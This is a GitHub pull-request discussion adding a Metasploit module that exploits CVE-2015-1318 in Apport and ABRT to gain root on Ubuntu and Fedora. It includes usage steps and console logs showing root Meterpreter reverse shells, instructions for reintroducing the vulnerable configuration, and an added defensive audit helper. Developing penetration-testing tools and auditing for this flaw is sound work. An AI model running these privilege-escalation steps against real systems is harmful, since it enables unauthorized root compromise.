Add Apport /Abrt chroot Privilege Escalation exploit #9399

Merged
merged 8 commits into from Feb 2, 2018

@bcoles
Contributor

bcoles commented Jan 12, 2018

Add Apport chroot Privilege Escalation exploit module.

    This module attempts to gain root privileges on Ubuntu by invoking
    the default coredump handler (Apport) inside a namespace ("container").

    Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
    vulnerable (CVE-2015-1318), due to a feature which allows forwarding
    reports to a container's Apport, causing usr/share/apport/apport
    within the crashed task's directory to be executed. Apport does not
    drop privileges, resulting in code execution as root.

    This module has been tested successfully on Apport 2.14.1
    on Ubuntu 14.04.1 LTS x86 and x86_64.

This module drops and executes Tavis' statically compiled C exploit. The exploit could be compiled on the host, but would require both gcc and libc. The issue is also exploitable using a shell script or python, but requires lxc to be installed, which doesn't appear to be default.

Fun fact: Tavis' exploit also works for abrt on Fedora. This module will also work on Fedora if you comment out the check conditional in exploit.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/apport_chroot_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/linux/local/apport_chroot_priv_esc
msf exploit(linux/local/apport_chroot_priv_esc) > set session 1
session => 1
msf exploit(linux/local/apport_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
[*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
[*] Launching exploit...
[+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
[*] Sending stage (857352 bytes) to 172.16.191.252
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
[+] Deleted /tmp/.drY6cJZ
[+] Deleted /tmp/.LtJvrgjXq

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : 172.16.191.252
OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Contributor

bcoles commented Jan 12, 2018

Travis build failed due to msftidy.

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/local/apport_chroot_priv_esc.rb - [ERROR] Please avoid unicode or non-printable characters in Author
modules/exploits/linux/local/apport_chroot_priv_esc.rb:32 - [ERROR] Unicode detected: " 'St\xC3\xA9phane Graber', # Independent discovery, PoC and patch\n"

This should be resolved by merging #9398 which removes the msftidy check for ASCII-only module and author names.

Contributor

jvoisin commented Jan 12, 2018

Fun fact: Tavis' exploit also works for abrt on Fedora. This module will also work on Fedora if you comment out the check conditional in exploit.

It might be worth adapting the check conditional then, wouldn't it?

Contributor

bcoles commented Jan 12, 2018

@jvoisin The bug in Fedora is very similar, but in different software. I figured a separate module would make more sense.

Contributor

h00die commented Jan 12, 2018

This actually checks 2 modules off my list which I had started many moons ago and never got around to finishing. Woohoo to non-ubuntu private escs!

Contributor

bcoles commented Jan 14, 2018

@jvoisin @h00die I've added Fedora support to this module rather than create a separate module.

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.BbYzSNPRo' (64812 bytes) ...
[*] Writing '/tmp/.jPlQ4zH' (207 bytes) ...
[*] Launching exploit...
[+] Upgraded session to root privileges
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 19 opened (172.16.191.244:4444 -> 172.16.191.137:56550) at 2018-01-14 03:06:05 -0500
[+] Deleted /tmp/.BbYzSNPRo
[+] Deleted /tmp/.jPlQ4zH

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Apport is vulnerable due to not dropping privileges before chrooting.

Abrt is not vulnerable to the same bug.

As it turns out, between April and August 2014, the Fedora crash handler was configured to chroot abrt, causing it to be vulnerable in almost exactly the same manner to Apport on Ubuntu.

@bcoles bcoles changed the title from Add Apport chroot Privilege Escalation exploit to Add Apport /Abrt chroot Privilege Escalation exploit Jan 14, 2018

@bcoles bcoles referenced this pull request Jan 17, 2018

Merged

Add ABRT raceabrt Privilege Escalation module #9422

@bcoles bcoles added docs and removed needs-docs labels Jan 27, 2018

Contributor

h00die commented Jan 31, 2018

need to rename your documentation extension from .rb to .md

Contributor

h00die commented Jan 31, 2018

Failed for me on ubuntu 14.04.5 ubuntu 32bit desktop edition.

msf exploit(linux/local/apport_abrt_chroot_priv_esc) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

^Z
Background session 1? [y/N]  y

msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[+] Linux kernel version 4.4.0 is vulnerable
[+] System is configured to use Apport for crash reporting
[+] Apport version 2.14.1 is vulnerable
[*] Writing '/tmp/.rQwVoqx' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.aWbYpzcWwj' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[-] Exploit aborted due to failure: unknown: Failed to gain root privileges
[*] Exploit completed, but no session was created.

In the interactive console I see:

w00t: failed to create chroot directory: File exists

maybe a bad cleanup or some randomization is needed?

Contributor

h00die commented Jan 31, 2018

Ubuntu 14.04 server x64 worked fine

msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[+] Linux kernel version 4.2.0 is vulnerable
[+] System is configured to use Apport for crash reporting
[+] Apport version 2.14.1 is vulnerable
[*] Writing '/tmp/.qdsVJ' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.WouqPlve2y' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Upgraded session to root privileges
uid=0(root) gid=1000(ubuntu) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(ubuntu)
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 192.168.2.156
[*] Meterpreter session 3 opened (192.168.2.117:4444 -> 192.168.2.156:32858) at 2018-01-31 10:46:34 -0500
[+] Deleted /tmp/.qdsVJ
[+] Deleted /tmp/.WouqPlve2y

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : Ubuntu14.04
OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Contributor

bcoles commented Jan 31, 2018

@h00die Renamed documentation.

Ubuntu 14.04.5 was released in August 2016 - about 18 months after the CVE. It's likely patched.

Contributor

h00die commented Feb 1, 2018

Must be backported, all the checks passed. I wonder if we can figure out a way to tell the backport.

Fedora 20 that i have laying around was too old of a kernel. Once updated the kernel, it patched itself. I can't "unpatch" until I get around selinux. I'll look it over in the next few days and I'll see if i can get it configured to be vuln correctly

Contributor

bcoles commented Feb 1, 2018

For Fedora 20, disable SELinux, reboot, and modify /proc/sys/kernel/core_pattern :

|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

For Fedora 19, I happened to have a VM lying around in the sweet spot of up-to-date kernel and vulnerable core_pattern. Similarly, it should be possible to introduce the vulnerability by changing the core_pattern as per above.
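A defender-side audit helper, added here as an example and not part of the Metasploit module, this PR, or Tavis' exploit. It encodes the two conditions this thread discusses, the Apport version range from the PR description and the Fedora core_pattern quoted in this comment, and classifies a crash-handler configuration as at risk or not. The sample patterns other than the quoted abrt chroot line are constructed, and the version check cannot see a distro backport of the fix.

```ruby
# Added audit helper (example code, not the Metasploit module or the
# upstream exploit). Inputs are passed in explicitly; on a live host you
# would read /proc/sys/kernel/core_pattern and the installed apport
# package version yourself and feed them to crash_handler_risk.

# Constructed sample inputs. The abrt chroot pattern is the one quoted in
# the PR discussion; the other three are typical values, not from the page.
UBUNTU_APPORT_PATTERN = '|/usr/share/apport/apport %p %s %c %P'
FEDORA_CHROOT_PATTERN = '|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e'
FEDORA_FIXED_PATTERN  = '|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e %P %I'
PLAIN_CORE_PATTERN    = 'core'

# "2.14.1-0ubuntu3" -> [2, 14, 1, 0, 3]; Array#<=> compares element-wise.
def version_tuple(version)
  version.to_s.scan(/\d+/).map(&:to_i)
end

# Apport 2.13 through 2.17.x before 2.17.1 is affected (CVE-2015-1318).
# A version string cannot reveal a backported fix, which is the false
# positive seen on 14.04.5 above, so treat true as "investigate further".
def apport_version_vulnerable?(version)
  v = version_tuple(version)
  return false if v.empty?
  (v <=> [2, 13]) >= 0 && (v <=> [2, 17, 1]) < 0
end

# :file (kernel writes a core file), :apport, :abrt_chroot (hook chrooted
# into the crashing task's root, the 2014 Fedora setup), :abrt or :unknown.
def classify_core_pattern(pattern)
  pat = pattern.to_s.strip
  return :file unless pat.start_with?('|')
  argv = pat[1..-1].split
  return :unknown if argv.empty?
  chrooted = argv.first.end_with?('/chroot') && argv.include?('/proc/%P/root')
  abrt     = argv.any? { |a| a.end_with?('abrt-hook-ccpp') }
  return :apport      if argv.first.end_with?('/apport')
  return :abrt_chroot if chrooted && abrt
  return :abrt        if abrt
  :unknown
end

# Combine both facts into a verdict. :at_risk is true, false or :unknown
# (apport configured but no version supplied, or an unrecognised handler).
def crash_handler_risk(core_pattern, apport_version = nil)
  handler = classify_core_pattern(core_pattern)
  case handler
  when :apport
    if apport_version.nil?
      { handler: handler, at_risk: :unknown, reason: 'apport configured; version not supplied' }
    elsif apport_version_vulnerable?(apport_version)
      { handler: handler, at_risk: true, reason: "apport #{apport_version} in CVE-2015-1318 range; check for a backported fix" }
    else
      { handler: handler, at_risk: false, reason: "apport #{apport_version} outside affected range" }
    end
  when :abrt_chroot
    { handler: handler, at_risk: true, reason: 'abrt-hook-ccpp runs chrooted into the crashing task root' }
  when :unknown then { handler: handler, at_risk: :unknown, reason: 'unrecognised pipe handler' }
  else
    { handler: handler, at_risk: false, reason: 'handler does not enter the crashing task namespace' }
  end
end
```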

Contributor

h00die commented Feb 2, 2018

Fedora 20 worked.

msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.2.1:4444 
[+] Linux kernel version 3.19.8 is vulnerable
[+] System is configured to chroot ABRT for crash reporting
[*] Writing '/tmp/.vaZSpyB' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.ljXjlnkUK' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Upgraded session to root privileges
uid=0(root) gid=1001(ubuntu) groups=0(root),1001(ubuntu)
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 1.1.2.3
[*] Meterpreter session 2 opened (1.1.2.1:4444 -> 1.1.2.3:32816) at 2018-02-01 20:03:53 -0500
[+] Deleted /tmp/.vaZSpyB
[+] Deleted /tmp/.ljXjlnkUK

meterpreter > getuid
Server username: uid=0, gid=1001, euid=0, egid=1001
meterpreter > sysinfo
Computer     : localhost.workGroup
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Contributor

h00die commented Feb 2, 2018

your docs need to be moved to the documentation folder as well

@h00die h00die merged commit 3c21eb8 into rapid7:master Feb 2, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

h00die added a commit that referenced this pull request Feb 2, 2018

Contributor

h00die commented Feb 2, 2018

Release Notes

The exploits/linux/local/apport_abrt_chroot_priv_esc module has been added to the framework. This module attempts to gain root privileges on Ubuntu 14.04 through Apport and on Fedora through ABRT. In both instances, the crash handler does not drop privileges, resulting in code execution as root.

Contributor

h00die commented Feb 2, 2018

Nice module, glad to get some more linux priv esc love! Now on to the other bunches you've submitted!

@bcoles bcoles deleted the bcoles:apport_chroot_priv_esc branch Feb 2, 2018

jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 2, 2018

@h00die h00die self-assigned this Feb 3, 2018
